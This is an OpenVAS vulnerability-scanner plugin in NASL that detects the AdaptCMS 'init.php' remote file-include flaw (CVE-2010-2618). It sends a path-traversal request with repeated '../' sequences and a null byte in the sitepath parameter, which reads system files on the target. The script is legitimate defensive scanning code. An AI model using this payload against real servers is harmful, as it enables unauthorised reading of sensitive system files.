###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_adaptcms_41116.nasl 13747 2019-02-18 18:20:21Z cfischer $
#
# AdaptCMS 'init.php' Remote File Include Vulnerability
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100852");
  script_version("$Revision: 13747 $");
  script_tag(name:"last_modification", value:"$Date: 2019-02-18 19:20:21 +0100 (Mon, 18 Feb 2019) $");
  script_tag(name:"creation_date", value:"2010-10-13 13:28:00 +0200 (Wed, 13 Oct 2010)");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2010-2618");
  script_bugtraq_id(41116);
  script_name("AdaptCMS 'init.php' Remote File Include Vulnerability");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
  script_dependencies("find_service.nasl", "http_version.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_xref(name:"URL", value:"https://www.securityfocus.com/bid/41116");
  script_xref(name:"URL", value:"http://www.adaptcms.com");

  script_tag(name:"summary", value:"AdaptCMS is prone to a remote file-include vulnerability because it
  fails to properly sanitize user-supplied input.");

  script_tag(name:"impact", value:"An attacker can exploit this vulnerability to obtain potentially
  sensitive information or to execute arbitrary script code in the context of the webserver process.
  This may allow the attacker to compromise the application and the computer. Other attacks are also possible.");

  script_tag(name:"affected", value:"AdaptCMS 2.0.0 Beta is vulnerable. Other versions may be affected.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
  of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
  release, disable respective features, remove the product or replace the product by another one.");

  script_tag(name:"qod_type", value:"remote_app");
  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("misc_func.inc");

port = get_http_port( default:80 );
if( ! can_host_php( port:port ) )
  exit( 0 );

files = traversal_files();

foreach dir( make_list_unique( "/cms", "/adaptcms", cgi_dirs( port:port ) ) ) {

  if( dir == "/" )
    dir = "";

  buf = http_get_cache( item:dir + "/sitemap.xml", port:port );
  if( ! buf )
    continue;

  if( buf =~ "^HTTP/1\.[01] 200" && egrep( pattern:"Generated by AdaptCMS", string:buf, icase:TRUE ) ) {

    foreach file( keys( files ) ) {

      url = string( dir, "/inc/smarty/libs/init.php?sitepath=", crap( data:"../", length:3*9 ), files[file], "%00" );

      if( http_vuln_check( port:port, url:url, pattern:file, extra_check:"Class 'Smarty' not found" ) ) {
        report = report_vuln_url( port:port, url:url );
        security_message( port:port, data:report );
        exit( 0 );
      }
    }
  }
}

exit( 99 );